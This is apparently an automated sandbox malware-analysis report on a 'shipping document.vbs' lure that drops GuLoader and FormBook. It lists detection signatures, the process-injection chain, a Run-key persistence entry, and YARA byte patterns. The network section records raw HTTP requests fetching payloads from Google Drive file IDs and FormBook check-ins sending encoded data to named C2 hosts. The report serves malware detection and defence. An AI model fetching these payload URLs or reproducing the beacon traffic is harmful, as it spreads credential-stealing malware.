Windows Analysis Report
shipping document.vbs

Overview

General Information

Sample name: shipping document.vbs
Analysis ID: 1430120
MD5: 1dce662b3782fbec7c5f4f73d8e63f41
SHA1: 25cf442e9e62d5a83dd81c980da84c5ec27dac75
SHA256: 35b1922951d049fedf34ebd18d57fd8acccaf65e462c6dc6308f5d63e17381ee
Tags: vbs

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates autostart registry keys with suspicious names
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2920 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 6332 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3756 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5852 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5104 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 4208 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 316 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • NJeXDhPqkKUqTApfiOc.exe (PID: 3564 cmdline: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • openfiles.exe (PID: 5116 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
              • NJeXDhPqkKUqTApfiOc.exe (PID: 6540 cmdline: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 4944 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wab.exe (PID: 6820 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 6024 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 3320 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.1940563125.00000000084A0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        Source | Rule | Description | Author | Strings
        amsi32_5852.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
        • 0xe129:$b2: ::FromBase64String(
        • 0xd1f0:$s1: -join
        • 0x699c:$s4: +=
        • 0x6a5e:$s4: +=
        • 0xac85:$s4: +=
        • 0xcda2:$s4: +=
        • 0xd08c:$s4: +=
        • 0xd1d2:$s4: +=
        • 0x1725a:$s4: +=
        • 0x172da:$s4: +=
        • 0x173a0:$s4: +=
        • 0x17420:$s4: +=
        • 0x175f6:$s4: +=
        • 0x1767a:$s4: +=
        • 0xd9c6:$e4: Get-WmiObject
        • 0xdbb5:$e4: Get-Process
        • 0xdc0d:$e4: Start-Process
        • 0x15d7c:$e4: Get-Process

        System Summary

        Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", ProcessId: 2920, ProcessName: wscript.exe
        Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" , CommandLine: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, NewProcessName: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, OriginalFileName: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 316, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe" , ProcessId: 3564, ProcessName: NJeXDhPqkKUqTApfiOc.exe
        Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\openfiles.exe, ProcessId: 5116, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\-PVHSLDXBF
        Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs", ProcessId: 2920, ProcessName: wscript.exe
        Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
        Timestamp: 04/23/24-07:55:11.026123, SID: 2855464, Source Port: 49720, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
        Timestamp: 04/23/24-07:55:13.838498, SID: 2855464, Source Port: 49721, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
        Timestamp: 04/23/24-07:55:19.489536, SID: 2855465, Source Port: 49723, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
        Timestamp: 04/23/24-07:55:34.111211, SID: 2855464, Source Port: 49724, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
        Timestamp: 04/23/24-07:54:55.001136, SID: 2855465, Source Port: 49719, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected

        AV Detection

        Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
        Source: shipping document.vbs, ReversingLabs: Detection: 31%
        Source: shipping document.vbs, Virustotal: Detection: 40%
        Source: Yara match, File source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: unknown, HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49706 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49707 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49715 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49716 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000009.00000002.1926528931.00000000008E8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbD9%m! source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe
        Source: Binary string: stem.Core.pdb source: powershell.exe, 00000009.00000002.1938944597.0000000008184000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbb: source: powershell.exe, 00000009.00000002.1939448940.00000000081E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wab.pdbGCTL source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp
        Source: Binary string: wab.pdb source: NJeXDhPqkKUqTApfiOc.exe, 00000012.00000002.2755874529.00000000025CC000.00000004.00000001.00040000.00000000.sdmp

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49719 -> 80.240.20.220:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 157.7.107.63:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49721 -> 157.7.107.63:80
        Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49723 -> 157.7.107.63:80
        Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 172.217.16.36:80
        Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
        Source: Joe Sandbox View, ASN Name: AS-CHOOPAUS AS-CHOOPAUS
        Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global traffic, HTTP traffic detected: GET /download?id=1enaCO0QiARITh4QuvSrQwWrYj3gEKjnh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg== HTTP/1.1Host: www.jthzbrdb.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global traffic, HTTP traffic detected: GET /3g97/?jJEDgF=14Ldh71M1tAlq6177H/PKNF5DbUzFdqFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkXEr3vevJ7TDEj044XktAOzbrek1ipg==&Z0cP=R2YdndZh2B6 HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: unknown, DNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /3g97/ HTTP/1.1Host: www.a-two-spa-salon.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 195Cache-Control: max-age=0Origin: http://www.a-two-spa-salon.comReferer: http://www.a-two-spa-salon.com/3g97/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 05:54:55 GMTContent-Type: text/htmlContent-Length: 1409Connection: closeVary: Accept-EncodingETag: "629dd94c-581"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Apr 2024 05:55:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: ApacheX-Powered-By: PHP/8.2.18Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
        Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: wscript.exe, 00000000.00000003.1587198761.0000023236DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1588971000.0000023236E3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589082209.0000023238BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, 00000000.00000003.1471191935.0000023238C09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470955854.0000023238BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b1a9c0e1c6
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF34C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
        Source: firefox.exe, 00000015.00000002.2537345110.000000002C054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://hostname.domain.tld/
        Source: powershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.ps/Docs/Repository.htm0
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDEFBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5P
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5XR
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDD9EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1oDj9i8b8gD74VUcO_0mAaRxSOZjEINB5&export=download
        Source: powershell.exe, 00000009.00000002.1927433604.0000000004687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1934884709.0000000007141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDE9B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1930663126.000000000559B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: powershell.exe, 00000003.00000002.1987110176.000001FCDD9E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF312000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987110176.000001FCDF335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49706 version: TLS 1.2
